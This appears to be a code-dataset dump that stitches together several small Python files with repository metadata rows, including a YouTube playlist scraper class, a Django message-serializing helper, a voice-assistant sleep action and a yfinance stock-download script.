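#   print(config.get("experiment_id"))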
def has_files_with_extension(directory, ext):
"""
Check if the directory has any files with the given extension.
Parameters
----------
directory : str
The path to the directory where output is located.
ext : str
        The given file extension.
Returns
-------
bool
True if directory contains files with given extension,
else False.
"""
files_with_extension = glob(join(directory, '*.{}'.format(ext)))
return len(files_with_extension) > 0
def get_output_directory_extension(directory, experiment_id):
"""
Check the output directory to determine what file extensions
exist. If more than one extension (in the possible list of
extensions) exists, then raise a ValueError. Otherwise,
return the one file extension. If no extensions can be found, then
`csv` will be returned by default.
Possible extensions include: `csv`, `tsv`, `xlsx`. Files in the
directory with none of these extensions will be ignored.
Parameters
----------
directory : str
The path to the directory where output is located.
experiment_id : str
The ID of the experiment.
Returns
-------
extension : {'csv', 'tsv', 'xlsx'}
The extension that output files in this directory
end with.
Raises
------
ValueError
If any files in the directory have different extensions,
and are in the list of possible output extensions.
"""
extension = 'csv'
extensions_identified = {ext for ext in POSSIBLE_EXTENSIONS
if has_files_with_extension(directory, ext)}
if len(extensions_identified) > 1:
raise ValueError('Some of the files in the experiment output directory (`{}`) '
'for `{}` have different extensions. All files in this directory '
'must have the same extension. The following extensions were '
'identified : {}'.format(directory,
experiment_id,
', '.join(extensions_identified)))
elif len(extensions_identified) == 1:
extension = list(extensions_identified)[0]
return extension
| 29.70073
| 111
| 0.616368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,550
| 0.62669
|
3bbaa7105c8bdb5d9e446a53505849bc8d258fd0
| 2,479
|
py
|
Python
|
src/aiotube/playlist.py
|
jnsougata/AioTube
|
719bc52e442d06f922ada65da7650cfb92a0f237
|
[
"MIT"
] | 4
|
2021-10-02T07:01:22.000Z
|
2021-12-30T08:27:36.000Z
|
src/aiotube/playlist.py
|
jnsougata/AioTube
|
719bc52e442d06f922ada65da7650cfb92a0f237
|
[
"MIT"
] | 2
|
2021-11-18T20:21:39.000Z
|
2021-12-27T17:12:17.000Z
|
src/aiotube/playlist.py
|
jnsougata/AioTube
|
719bc52e442d06f922ada65da7650cfb92a0f237
|
[
"MIT"
] | 3
|
2021-10-01T03:21:33.000Z
|
2021-12-21T20:49:30.000Z
|
from ._threads import _Thread
from .utils import filter
from .videobulk import _VideoBulk
from ._http import _get_playlist_data
from ._rgxs import _PlaylistPatterns as rgx
from typing import List, Optional, Dict, Any
class Playlist:
__HEAD = 'https://www.youtube.com/playlist?list='
def __init__(self, playlist_id: str):
"""
:param str playlist_id: the _id of the playlist
"""
if 'youtube.com' in playlist_id:
self.id = playlist_id.split('list=')[-1]
else:
self.id = playlist_id
self.__playlist_data = _get_playlist_data(self.id)
def __repr__(self):
return f'<Playlist {self.url}>'
@property
def name(self) -> Optional[str]:
"""
:return: the name of the playlist
"""
names = rgx.name.findall(self.__playlist_data)
return names[0] if names else None
@property
def url(self) -> Optional[str]:
"""
:return: url of the playlist
"""
return f'https://www.youtube.com/playlist?list={self.id}'
@property
def video_count(self) -> Optional[str]:
"""
:return: total number of videos in that playlist
"""
video_count = rgx.video_count.findall(self.__playlist_data)
return video_count[0] if video_count else None
@property
def videos(self) -> _VideoBulk:
"""
:return: list of < video objects > for each video in the playlist (consider limit)
"""
videos = rgx.video_id.findall(self.__playlist_data)
return _VideoBulk(filter(iterable=videos))
@property
def thumbnail(self) -> Optional[str]:
"""
:return: url of the thumbnail of the playlist
"""
thumbnails = rgx.thumbnail.findall(self.__playlist_data)
return thumbnails[0] if thumbnails else None
@property
def info(self) -> Dict[str, Any]:
"""
:return: a dict containing playlist info
"""
def _get_data(pattern):
data = pattern.findall(self.__playlist_data)
return data[0] if data else None
patterns = [rgx.name, rgx.video_count, rgx.thumbnail]
data = _Thread.run(_get_data, patterns)
return {
'name': data[0],
'video_count': data[1],
            'videos': filter(iterable=rgx.video_id.findall(self.__playlist_data)),
'url': self.__HEAD + self.id,
'thumbnail': data[2]
}
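# Usage sketch (the playlist id below is a placeholder, not a real playlist):
#
#   playlist = Playlist("PLxxxxxxxxxxxxxxxx")
#   print(playlist.name, playlist.video_count)
#   bulk = playlist.videos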
| 27.853933
| 90
| 0.592981
| 2,251
| 0.908027
| 0
| 0
| 1,750
| 0.70593
| 0
| 0
| 668
| 0.269463
|
3bbaf9656983dcec4f85d013784da058e74250a8
| 160
|
py
|
Python
|
actions/sleep.py
|
bhaveshAn/Lucy
|
9ea97184c725a10a041af64cad0ef4b533be42ad
|
[
"MIT"
] | 1
|
2018-04-13T08:26:27.000Z
|
2018-04-13T08:26:27.000Z
|
actions/sleep.py
|
bhaveshAn/Lucy
|
9ea97184c725a10a041af64cad0ef4b533be42ad
|
[
"MIT"
] | null | null | null |
actions/sleep.py
|
bhaveshAn/Lucy
|
9ea97184c725a10a041af64cad0ef4b533be42ad
|
[
"MIT"
] | null | null | null |
import random
def go_to_sleep(text):
replies = ['See you later!', 'Just call my name and I\'ll be there!']
return (random.choice(replies))
quit()
| 20
| 73
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 55
| 0.34375
|
3bbc9e86460d1c4a98d44711f0b944fd26bd0864
| 441
|
py
|
Python
|
django_sso_app/core/api/utils.py
|
paiuolo/django-sso-app
|
75b96c669dc0b176dc77e08f018a3e97d259f636
|
[
"MIT"
] | 1
|
2021-11-16T15:16:08.000Z
|
2021-11-16T15:16:08.000Z
|
django_sso_app/core/api/utils.py
|
paiuolo/django-sso-app
|
75b96c669dc0b176dc77e08f018a3e97d259f636
|
[
"MIT"
] | null | null | null |
django_sso_app/core/api/utils.py
|
paiuolo/django-sso-app
|
75b96c669dc0b176dc77e08f018a3e97d259f636
|
[
"MIT"
] | null | null | null |
import logging
from django.contrib.messages import get_messages
from django.utils.encoding import force_str
logger = logging.getLogger('django_sso_app')
def get_request_messages_string(request):
"""
Serializes django messages
:param request:
:return:
"""
storage = get_messages(request)
_messages = []
for message in storage:
_messages.append(force_str(message))
return ', '.join(_messages)
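# Usage sketch (assumes a Django view function; `request` is supplied by the
# framework and any queued messages come from django.contrib.messages):
#
#   def my_view(request):
#       summary = get_request_messages_string(request)
#       logger.info(summary)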
| 20.045455
| 48
| 0.709751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 96
| 0.217687
|
3bbcc2fb4051ff428b3a3b66b12c0e4e0235c79c
| 1,092
|
py
|
Python
|
download_stock_data.py
|
dabideee13/Price-Pattern-Prediction
|
632d961fc08777adab8eeb7ecbf16ac7cc71a3a7
|
[
"MIT"
] | null | null | null |
download_stock_data.py
|
dabideee13/Price-Pattern-Prediction
|
632d961fc08777adab8eeb7ecbf16ac7cc71a3a7
|
[
"MIT"
] | null | null | null |
download_stock_data.py
|
dabideee13/Price-Pattern-Prediction
|
632d961fc08777adab8eeb7ecbf16ac7cc71a3a7
|
[
"MIT"
] | null | null | null |
#!/opt/anaconda3/bin/python
# -*- coding: utf-8 -*-
"""
Get Stock Data
"""
import time
import pandas as pd
import yfinance as yf
if __name__ == '__main__':
# Path to file
# TODO: make directory if directory doesn't exist
f_file = "/Users/d.e.magno/Datasets/raw_stocks_new.csv"
# TODO: need to check which is already downloaded
stock_file = pd.read_csv('/Users/d.e.magno/Datasets/tickers/generic.csv')
stock_list = stock_file.Ticker
start_timeA = time.time()
for stock in stock_list:
try:
start_timeB = time.time()
print("Downloading {}...".format(stock))
yf.Ticker(stock).history(period="max").to_csv(
f_file.format(stock))
time.sleep(10)
end_timeB = time.time()
print("Time elapsed:", end_timeB - start_timeB)
print()
except Exception as ex:
pass
except KeyboardInterrupt as ex:
break
print("Finished.")
end_timeA = time.time()
print("Total time elapsed:", end_timeA - start_timeA)
| 24.266667
| 77
| 0.598901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 358
| 0.327839
|
3bbd5cc24a379d3da78746ccf10468524d2749f7
| 2,421
|
py
|
Python
|
_int_tools.py
|
CaptainSora/Python-Project-Euler
|
056400f434eec837ece5ef06653b310ebfcc3d4e
|
[
"MIT"
] | null | null | null |
_int_tools.py
|
CaptainSora/Python-Project-Euler
|
056400f434eec837ece5ef06653b310ebfcc3d4e
|
[
"MIT"
] | null | null | null |
_int_tools.py
|
CaptainSora/Python-Project-Euler
|
056400f434eec837ece5ef06653b310ebfcc3d4e
|
[
"MIT"
] | null | null | null |
"""
This module contains functions related to integer formatting and math.
"""
from functools import reduce
from itertools import count
from math import gcd, prod
# ================ ARRAY FORMATTING FUNCTIONS ================
def str_array_to_int(intarray):
return int(''.join(intarray))
def int_array_to_int(intarray):
return str_array_to_int(map(str, intarray))
def int_to_int_array(num):
"""
Deprecated, use int_to_digit_array(num)
"""
return [int(str(num)[a]) for a in range(len(str(num)))]
def int_to_str_array(num):
return [str(num)[a] for a in range(len(str(num)))]
def int_to_digit_array(num):
return [int(str(num)[a]) for a in range(len(str(num)))]
# ================ CALCULATION FUNCTIONS ================
def product(numlist):
"""
Deprecated since Python 3.8, use math.prod instead
Also remove functools.reduce
"""
return reduce(lambda x, y: x * y, numlist, 1)
def factorial(num):
return prod(list(range(1, num + 1)))
def nCr(n, r):
return int(prod(range(n-r+1, n+1)) / prod(range(1, r+1)))
def phi(n):
"""
Returns the value of ϕ(n), or the Euler Totient function.
"""
return len([x for x in range(1, n) if gcd(n, x) == 1])
# ================ COUNTING FUNCTIONS ================
def counting_summations(values, target):
"""
Returns the number of ways to write target as the sum of numbers in values.
"""
csums = [[0 for _ in values]]
while len(csums) <= target:
tempsum = [0 for _ in values]
for a in range(len(values)):
if values[a] > len(csums):
break
elif values[a] == len(csums):
tempsum[a] = 1
else:
tempsum[a] += sum(csums[len(csums) - values[a]][:a+1])
csums.append(tempsum)
return sum(csums[target])
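# For example, counting_summations([1, 2], 4) == 3, because
# 4 = 1+1+1+1 = 1+1+2 = 2+2.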
def partition():
"""
Calculates the partition function using Euler's method.
Much faster than the above function.
"""
yield 1
p = [1]
for i in count(1):
new_p = 0
for j in count(1):
# move i
if j % 2 == 0:
i -= j // 2
else:
i -= j
if i < 0:
break
# add to new_p
if (j - 1) % 4 < 2:
new_p += p[i]
else:
new_p -= p[i]
p.append(new_p)
yield new_p
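# For example, itertools.islice(partition(), 10) yields the first ten
# partition numbers: 1, 1, 2, 3, 5, 7, 11, 15, 22, 30.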
| 23.278846
| 79
| 0.534077
| 0
| 0
| 567
| 0.234104
| 0
| 0
| 0
| 0
| 706
| 0.291495
|
3bbf01d5cb0102d02a8a8a3dba1f25da4c1520b3
| 2,260
|
py
|
Python
|
source/stats/lstm_model_builder.py
|
dangtunguyen/nids
|
a92b56a5ac29cc1482ae29374eef02bb7654785f
|
[
"MIT"
] | 2
|
2019-11-22T19:56:50.000Z
|
2020-12-15T02:43:52.000Z
|
source/stats/lstm_model_builder.py
|
dangtunguyen/nids
|
a92b56a5ac29cc1482ae29374eef02bb7654785f
|
[
"MIT"
] | null | null | null |
source/stats/lstm_model_builder.py
|
dangtunguyen/nids
|
a92b56a5ac29cc1482ae29374eef02bb7654785f
|
[
"MIT"
] | 2
|
2020-12-15T02:43:54.000Z
|
2021-11-05T03:19:59.000Z
|
#!/usr/bin/env python
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout, TimeDistributed, Flatten
from keras.layers import LSTM
'''
Reference: https://keras.io/getting-started/sequential-model-guide/
A stateful recurrent model is one for which the internal states (memories)
obtained after processing a batch of samples are reused as initial states
for the samples of the next batch. This allows to process longer sequences
while keeping computational complexity manageable.
'''
class LstmModelBuilder:
def __init__(self, batch_size, timesteps, data_dim, stateful, epochs, hidden_size, model_save_path):
self.batch_size = batch_size
self.timesteps = timesteps ## These are the past observations for a feature, such as lag variables
self.data_dim = data_dim ## These are columns in your data
self.stateful = stateful
self.epochs = epochs
self.hidden_size = hidden_size
self.model_save_path = model_save_path # Path where trained model will be saved
self.model = Sequential()
self.create_model()
def create_model(self):
## batch_input_shape: (batch_size, timesteps, data_dim)
self.model.add(LSTM(self.hidden_size, return_sequences=True, batch_input_shape=(self.batch_size, self.timesteps, self.data_dim), stateful=self.stateful))
self.model.add(LSTM(self.hidden_size, return_sequences=True, stateful=self.stateful))
self.model.add(LSTM(self.hidden_size, return_sequences=True, stateful=self.stateful))
self.model.add(Dropout(0.5))
#self.model.add(Flatten())
#self.model.add(Dense(1, activation='sigmoid'))
self.model.add(TimeDistributed(Dense(1))) # output_dim=1
self.model.add(Activation('sigmoid'))
self.model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
        self.model.summary()  # prints the layer-by-layer summary itself
## trainX: input data
## trainY: output label
def train(self, trainX, trainY):
history = self.model.fit(trainX, trainY, epochs=self.epochs, batch_size=self.batch_size, verbose=0, shuffle=False)
print(history.history)
def save(self):
self.model.save(self.model_save_path)
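# Usage sketch (all hyper-parameter values and the save path below are
# illustrative assumptions):
#
#   builder = LstmModelBuilder(batch_size=32, timesteps=10, data_dim=8,
#                              stateful=False, epochs=5, hidden_size=64,
#                              model_save_path="lstm_model.h5")
#   builder.train(trainX, trainY)  # trainX: (n*32, 10, 8), trainY: (n*32, 10, 1)
#   builder.save()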
| 48.085106
| 161
| 0.712389
| 1,737
| 0.768584
| 0
| 0
| 0
| 0
| 0
| 0
| 750
| 0.331858
|
3bc0be85bb851d619749be911d22c015dc81cc08
| 26,696
|
py
|
Python
|
pyinstagram/base.py
|
alessandrocucci/PyInstagram
|
cd8f30b8c470a8cdcd8da801af897e4d14f7a677
|
[
"MIT"
] | 1
|
2019-05-03T17:46:02.000Z
|
2019-05-03T17:46:02.000Z
|
pyinstagram/base.py
|
alessandrocucci/PyInstagram
|
cd8f30b8c470a8cdcd8da801af897e4d14f7a677
|
[
"MIT"
] | 1
|
2021-06-01T21:51:23.000Z
|
2021-06-01T21:51:23.000Z
|
pyinstagram/base.py
|
alessandrocucci/PyInstagram
|
cd8f30b8c470a8cdcd8da801af897e4d14f7a677
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import random
from datetime import datetime
from operator import itemgetter
import requests
import time
from pyinstagram.model import Media
from .exceptions import OAuthException, PyInstagramException
from .oauth import OAuth
from .constants import API_URL
from .utils import DESAdapter
class InstagramApiClient(object):
"""
    Base class for calls to the official Instagram API.
"""
def __init__(self, access_token=None):
self.access_token = access_token
if isinstance(access_token, OAuth):
self.access_token = access_token.access_token
if not self.access_token:
            # TODO: handle the case where the access token has expired
            raise OAuthException("You must authenticate before using the library!")
@staticmethod
def go_to_sleep(seconds=3600):
"""
        This method is called when the limit allowed by the API has been
        reached; when that happens, the program is paused for an hour.
        :param seconds: int - number of seconds to wait
:return: None
"""
time.sleep(seconds)
def _make_request(self, uri, method='get', data=None):
"""
        Performs a request against the Instagram API.
        :param uri: str - the URI to call
        :param method: str - HTTP method to use for the request
        :param data: dict - dictionary with the data to send in the request
        :return: list - list of response data
"""
next_url = "" # per la paginazione
res = []
        retry = 1  # used to retry the call after an hour if the request limit was hit
while retry:
res = getattr(requests, method)(uri, data=data)
res, next_url = self._handle_response(res)
if res == 0:
                # the call failed because the request limit was reached;
                # we have already waited an hour, so try again now.
continue
retry = 0
return res, next_url
def _handle_response(self, request):
"""
        Once the call has been made, take care of interpreting its response.
        If the request succeeded, return the list of data; otherwise either
        pause the program (if the API limit has been reached) or raise an
        appropriate exception.
        :param request: requests - the response of the call
        :return: list - list of received data
"""
if request.status_code == 200:
            # All good!
try:
res = request.json()
except Exception:
raise Exception(request.text)
else:
data = res['data']
next_url = res.get('pagination', {}).get('next_url')
return data, next_url
elif request.status_code == 429:
# OAuthRateLimitException
self.go_to_sleep()
return 0
elif request.status_code == 400:
raise OAuthException(request.json()['meta']['error_message'])
elif "<!DOCTYPE html>" in request.text:
raise PyInstagramException("Page not found")
else:
raise PyInstagramException
def get_by_user(self, id_user=None, count=0):
"""
        Method used to fetch the most recent posts of a user.
        If the id_user parameter is not passed, the posts of the user
        who authorized the app are requested.
        :param id_user: str - user whose posts should be fetched
        :param count: int - limit to {count} results
        :return: list - list of data
"""
all_media = []
id_user = id_user or "self"
url = API_URL + "users/{0}/media/recent/?access_token={1}".format(id_user, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
if len(all_media) > count:
return all_media[:count]
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media[:count]
def get_by_hashtag(self, tags=(), count=0):
"""
        Method used to search posts with one or more hashtags.
        :param tags: iterable - the hashtags to search for
        :param count: int - maximum number of results to return
        :return: list - list of data
"""
if isinstance(tags, str):
tags = (tags, )
all_media = []
for tag in tags:
url = API_URL + "tags/{0}/media/recent?access_token={1}".format(tag, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media
def search_for_tag(self, tag, count=3):
"""
        Method used to search for hashtags similar to another one.
        :param tag: str - hashtag to search for
        :param count: int - limit on the number of hashtags
:return: dict
"""
url = API_URL + "tags/search?q={0}&access_token={1}".format(tag, self.access_token)
res, _ = self._make_request(url)
res = sorted(res, key=itemgetter('media_count'))
names = {r['name']: r['media_count'] for r in res[:count]}
return names
class InstagramJsonClient(object):
"""
    Class for making simple GET requests without using an access token
    or the official API. Makes heavy use of URLs with query strings.
"""
def __init__(self):
self.base_url = "https://www.instagram.com/"
self.session = self._init_session()
def _init_session(self):
"""Abilita il supporto 3DES su Instagram"""
s = requests.Session()
s.mount(self.base_url, DESAdapter())
return s
def get_user_info(self, user):
"""
        Returns the information of a user
        :param user: Instagram username
        :return: dictionary with the user's info
"""
base_url = "{base}{user}/?__a=1".format(
base=self.base_url,
user=user
)
res = self.session.get(base_url)
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(base_url))
return res.get('user', {})
def get_by_user(self, user, count=None, since=None, until=None):
"""
        Searches the (public) posts of a user.
        Handles pagination automatically.
        Returns a list of dictionaries structured as follows:
[
{
id: "1606977067425770236_528817151",
code: "BZNISDyHKr8",
user: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
},
images: {
thumbnail: {
width: 150,
height: 150,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
low_resolution: {
width: 320,
height: 320,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s640x640/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
}
},
created_time: "1505786616",
caption: {
id: "17887172635109592",
text: "Look up in the sky tonight and see Saturn! This month Saturn is the only prominent evening planet low in the southwest sky. Look for it near the constellation Sagittarius. Above and below Saturn--from a dark sky--you can't miss the summer Milky Way spanning the sky from northeast to southwest! Grab a pair of binoculars and scan the teapot-shaped Sagittarius, where stars and some brighter clumps appear as steam from the teapot. Those bright clumps are near the center of our galaxy, which is full of gas, dust and stars. Credit: NASA #nasa #space #astronomy #september #whatsup #night #nightsky #stars #stargazing #saturn #planet",
created_time: "1505786616",
from: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
}
},
user_has_liked: false,
likes: {
data: [
{
id: "4010977557",
full_name: "Natalia",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/14482183_140565769737733_5249004653428867072_a.jpg",
username: "nata.barata"
},
{
id: "2055640911",
full_name: "S@brin@ Lec○cq ♡☆♡",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/13534211_1557747037863158_1773299287_a.jpg",
username: "melsab19"
},
{
id: "752521983",
full_name: "Laura Álvarez Peláez",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10624147_809215025765686_985825156_a.jpg",
username: "lauriwushu"
},
{
id: "1719376530",
full_name: "Julia Paniti",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10985984_1575721159312127_239135761_a.jpg",
username: "julia_paniti"
}
],
count: 204038
},
comments: {
data: [
{
id: "17876620534138631",
text: "@jennytried ❤️",
created_time: "1505855823",
from: {
id: "4610349",
full_name: "",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10932285_747424172021124_1089839988_a.jpg",
username: "siskascherz"
}
},
{
id: "17899664473040297",
text: "@a.hm.ed.1",
created_time: "1505855825",
from: {
id: "416900232",
full_name: "Maryem BenKh",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/16907969_415736022127336_8841431139366207488_a.jpg",
username: "maariam_bk"
}
},
{
id: "17871962107174729",
text: "Wonderful 😍",
created_time: "1505855872",
from: {
id: "2982243595",
full_name: "Smit Raj",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/21690360_117321958944805_772082897589895168_n.jpg",
username: "smit_raj_"
}
}
],
count: 1564
},
can_view_comments: true,
can_delete_comments: false,
type: "video",
link: "https://www.instagram.com/p/BZNISDyHKr8/",
location: null,
alt_media_url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4",
videos: {
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4"
},
low_bandwidth: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
},
low_resolution: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
}
},
video_views: 1012473
},
]
        :param user: str - Instagram username
        :param count: int - limits the number of results
        :param since: str - results starting from this date, e.g. "20170101000000"
        :param until: str - results up to this date, e.g. "20171231235959"
:return:
"""
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
all_data = []
base_url = "{base}{user}?__a=1{{max}}".format(
base=self.base_url,
user=user
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
if not res.status_code == 200:
return all_data[:count]
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
for media_res in res['user']['media']['nodes']:
                # Instagram does not allow searching by date, but it does provide
                # the post's creation date as a Unix timestamp. So, to handle the
                # case where only results within a certain interval are wanted,
                # check that the post was created within that time span.
created_at = int(media_res['date'])
if since and created_at < time.mktime(since.timetuple()):
                    # we have gone too far back, we can stop here
return all_data[:count]
if until and created_at > time.mktime(until.timetuple()):
continue
all_data.append(media_res)
if res['user']['media']['nodes'] and (not len(all_data) > count if count else True):
                # we have items, there are more to download, and the result limit has not been reached
try:
max_id = res['user']['media']['nodes'][-1]['id']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
                    # wait a while: the index is empty and Instagram is throttling the flow
time.sleep(random.randint(10, 60))
else:
                    # all good, there is more data to download
continue
else:
                # no data, or we already have more than requested
break
return all_data[:count]
def get_by_hashtag(self, tags=(), count=1000000, top_posts=True, since=None, until=None):
"""
        Search by hashtag.
        Handles pagination automatically.
        Returns a list of SqlAlchemy objects built from
        a list of dictionaries structured as follows:
[
{
comments_disabled: false,
id: "1607551655901147333",
dimensions: {
height: 640,
width: 640
},
owner: {
id: "981246989"
},
thumbnail_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
thumbnail_resources: [
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 150,
config_height: 150
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s240x240/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 240,
config_height: 240
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 320,
config_height: 320
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s480x480/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 480,
config_height: 480
}
],
is_video: false,
code: "BZPK7bAFDDF",
date: 1505855112,
display_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
caption: "Tommy Hilfiger London Fashion Week Spring_Summer 2018 @londonfashionweek @britishfashioncouncil @tommyhilfiger #londonfashionweek#LFW#fashion#paris#fashionblogger#tehran#fashioneditor#fashionweek#style#streetstyle##milan#london#newyork#mfw#lfw#nyfw#vogue#gq#art#love#fashionshow#blogger#life#event#ss2018#instafashion#runway#fashionmoment0#TOMMYNOW",
comments: {
count: 1
},
likes: {
count: 24
}
},
]
        :param tags: str or tuple - hashtag (without the #) or tuple of hashtags
        :param count: int - limits the results
        :param top_posts: bool - limit to top posts, otherwise return everything
        :param since: str - results starting from this date, e.g. "20170101000000"
        :param until: str - results up to this date, e.g. "20171231235959"
        :return: list - list of dictionaries
"""
if isinstance(tags, str):
tags = (tags, )
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
mapper = {
'id': 'id',
'comments': 'edge_media_to_comment.count',
'unix_datetime': 'taken_at_timestamp',
'user': 'owner.id',
'likes': 'edge_liked_by.count',
'is_video': 'is_video',
'url': 'display_src',
'height': 'dimensions.height',
'width': 'dimensions.width',
'code': 'shortcode'
}
all_data = []
for tag in tags:
all_data_tag = []
base_url = "{base}explore/tags/{tag}?__a=1{{max}}".format(
base=self.base_url,
tag=tag
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
                        # post removed or no longer reachable
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
res_media = res['graphql']['hashtag']['edge_hashtag_to_top_posts'] if top_posts else res['graphql']['hashtag']['edge_hashtag_to_media']
has_next_page = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['has_next_page']
                # convert to SqlAlchemy objects
sqlalchemy_media = []
for element in res_media['edges']:
                    # Instagram does not allow searching by date, but it does provide
                    # the post's creation date as a Unix timestamp. So, to handle the
                    # case where only results within a certain interval are wanted,
                    # check that the post was created within that time span.
created_at = int(element['node']['taken_at_timestamp'])
if since and created_at < time.mktime(since.timetuple()):
                        # we have gone too far back, we can stop here
break
if until and created_at > time.mktime(until.timetuple()):
continue
model = Media()
for field_to, getter in mapper.items():
path = getter.split('.')
val = element['node']
for key in path:
val = val.get(key, {})
if isinstance(val, dict):
val = None
setattr(model, field_to, val)
model.json = element['node']
model.caption = element['node']['edge_media_to_caption']['edges'][0]['node']['text']
sqlalchemy_media.append(model)
all_data_tag.extend(sqlalchemy_media)
if res_media['edges'] and has_next_page and not len(all_data_tag) > count and not top_posts:
try:
max_id = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
                        # wait a while: the index is empty and Instagram is throttling the flow
time.sleep(random.randint(10, 60))
else:
                        # all good, there is more data to download
continue
else:
                    # no data, or we already have more than requested
break
all_data.extend(all_data_tag)
return all_data[:count]
def get_by_media_codes(self, codes=(), all_comments=False):
"""
        Returns a list containing the data of the requested posts
        (identified by the post's 'code' string). When the all_comments
        flag is enabled, further requests are made to page through the
        comments. The comments are appended to the original json so that
        the final list has as many elements as there are requested posts.
        :param codes: code string or tuple with the post codes
        :param all_comments: bool - if enabled, download all comments
        :return: list of json objects with the data of the requested posts
"""
if isinstance(codes, str):
codes = (codes,)
all_data = []
for code in codes:
url = "{base}p/{code}?__a=1".format(
base=self.base_url,
code=code
)
res = self.session.get(url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
                    # post removed or no longer reachable
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(url))
if all_comments:
while True:
page_info = res['graphql']['shortcode_media']['edge_media_to_comment']['page_info']
if page_info['has_next_page']:
next_url = url + "&max_id={}".format(page_info['end_cursor'])
next_res = self.session.get(next_url)
next_res = next_res.json()
res_edges = res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
next_edges = next_res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
res_edges.extend(next_edges)
else:
break
all_data.append(res)
return all_data
| 44.271973
| 661
| 0.523599
| 26,411
| 0.987992
| 0
| 0
| 342
| 0.012794
| 0
| 0
| 16,960
| 0.634446
|
3bc1971c02e3a51d7591b4d8543cd3bec3e278e6
| 1,483
|
py
|
Python
|
csv_readers/stay_points_csv_reader.py
|
s0lver/stm-creator
|
b058185ca028abd1902edbb35a52d3565b06f8b0
|
[
"Apache-2.0"
] | null | null | null |
csv_readers/stay_points_csv_reader.py
|
s0lver/stm-creator
|
b058185ca028abd1902edbb35a52d3565b06f8b0
|
[
"Apache-2.0"
] | null | null | null |
